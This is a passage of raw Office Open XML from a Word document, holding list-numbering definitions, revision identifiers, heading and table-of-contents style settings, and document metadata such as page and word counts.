      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="D4845562">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="24C85846">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="D71E2F38">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E85A7614">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="73E02CCA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="03C6FDC0"/>
    <w:lvl w:ilvl="0" w:tplc="3E1C4C8A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="99FCC25A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="AEC2E27A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="FCCCA4F8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="342AB6B6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="007E2338">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="A60EE53E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="FFC6F0EA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="D1A8B462">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7A54357A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7E18D79E"/>
    <w:lvl w:ilvl="0" w:tplc="6152F6CA">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="6EC29712">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="090A30A4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="87100724">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="6696EB0E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="2B688A12">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="804423AE">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="16041410">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0CEC3BFC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1781801452">
    <w:abstractNumId w:val="0"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="8528366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44D"/>
    <w:rsid w:val="00044AD9"/>
    <w:rsid w:val="00054BAC"/>
    <w:rsid w:val="00066B00"/>
    <w:rsid w:val="001A7A4A"/>
    <w:rsid w:val="002045CF"/>
    <w:rsid w:val="00297E2A"/>
    <w:rsid w:val="002A2AC2"/>
    <w:rsid w:val="00361CDB"/>
    <w:rsid w:val="0040162F"/>
    <w:rsid w:val="00427AF3"/>
    <w:rsid w:val="00455F63"/>
    <w:rsid w:val="00466E30"/>
    <w:rsid w:val="00470094"/>
    <w:rsid w:val="00492C6B"/>
    <w:rsid w:val="004B5C58"/>
    <w:rsid w:val="004C3647"/>
    <w:rsid w:val="00552090"/>
    <w:rsid w:val="00564B00"/>
    <w:rsid w:val="0062444D"/>
    <w:rsid w:val="006A6892"/>
    <w:rsid w:val="006B1806"/>
    <w:rsid w:val="006D5005"/>
    <w:rsid w:val="00704AE7"/>
    <w:rsid w:val="00737B11"/>
    <w:rsid w:val="00787FFD"/>
    <w:rsid w:val="00833017"/>
    <w:rsid w:val="008B499D"/>
    <w:rsid w:val="009D0C4F"/>
    <w:rsid w:val="009F18E8"/>
    <w:rsid w:val="00AF0E5B"/>
    <w:rsid w:val="00BA61EA"/>
    <w:rsid w:val="00CD3B81"/>
    <w:rsid w:val="00D25CFF"/>
    <w:rsid w:val="00D62D4B"/>
    <w:rsid w:val="00DB4052"/>
    <w:rsid w:val="00DF5EA8"/>
    <w:rsid w:val="00E10604"/>
    <w:rsid w:val="00E833CE"/>
    <w:rsid w:val="00EF35EC"/>
    <w:rsid w:val="00F63105"/>
    <w:rsid w:val="00FF268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8956"/>
  <w15:docId w15:val="{E194014D-4857-44EE-98AD-2ED98891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360" w:after="200"/>
      <w:ind w:left="200"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FFFFFF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="2E75B6"/>
      </w:pBdr>
      <w:spacing w:before="280" w:after="140"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1F3864"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:uiPriority w:val="9"/>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18E8"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009F18E8"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="240"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009F18E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856</TotalTime>
  <Pages>32</Pages>
  <Words>6230</Words>
  <Characters>35516</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>295</Lines>
  <Paragraphs>83</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>41663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moz dav</cp:lastModifiedBy>
  <cp:revision>27</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-06T23:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-27T18:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>